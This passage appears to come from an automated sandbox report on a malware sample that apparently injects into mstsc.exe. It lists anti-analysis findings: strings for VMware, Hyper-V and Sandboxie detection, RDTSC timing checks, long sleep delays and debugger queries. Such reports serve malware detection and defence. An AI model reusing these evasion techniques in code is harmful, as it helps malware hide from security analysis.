          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: JFBlvEr5H9.exe PID: 2036, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000006F85E4 second address: 00000000006F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000006F896E second address: 00000000006F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe TID: 2372Thread sleep time: -43107s >= -30000s
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exe TID: 3492Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeThread delayed: delay time: 43107
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.290736367.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: mstsc.exe, 00000015.00000002.500310779.000000000097D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWH*
          Source: explorer.exe, 00000006.00000000.310857796.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: mstsc.exe, 00000015.00000002.500386760.00000000009A8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.303415841.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.290828645.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000000.280280009.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: mstsc.exe, 00000015.00000002.500386760.00000000009A8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,
          Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.290828645.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: JFBlvEr5H9.exe, 00000000.00000002.259577263.0000000002E41000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.290286328.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 21_2_04B80EA5 mov eax, dword ptr fs:[00000030h]
